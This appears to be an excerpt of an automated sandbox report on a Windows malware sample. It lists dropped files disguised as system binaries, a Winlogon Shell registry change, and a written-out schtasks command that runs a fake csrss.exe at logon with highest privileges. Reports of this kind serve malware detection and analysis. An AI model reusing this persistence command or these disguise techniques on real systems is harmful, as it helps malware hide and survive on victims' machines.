                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.9.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.11.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, u003315/B9B.cs.Net Code: 62Q System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.0.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, u003315/B9B.cs.Net Code: 62Q System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.f50000.1.unpack, Atsthjjfumvdxjgbafdfm/SchemaValueWriter.cs.Net Code: ViewStrategy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_01069210 push 6800E31Eh; retf 2_2_0106921D
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeCode function: 19_2_029749EC push ds; retf 19_2_02974B09
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00F012A1 push es; ret 22_2_00F012B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078EAAC2 push es; ret 22_2_078EAAD0
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeStatic PE information: 0xD2C4E610 [Tue Jan 20 07:21:52 2082 UTC]

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeExecutable created and started: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Recovery\csrss.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\System Volume Information\Chkdsk\SearchUI.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Windows\SysWOW64\iasnap\fontdrvhost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Recovery\csrss.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Recovery\JRFdtWyAvbQxLlvO.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Users\user\AppData\Roaming\qwevqjeiqvj.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Windows\SysWOW64\iasnap\fontdrvhost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Windows\SysWOW64\comrepl\fontdrvhost.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\System Volume Information\Chkdsk\SearchUI.exeJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
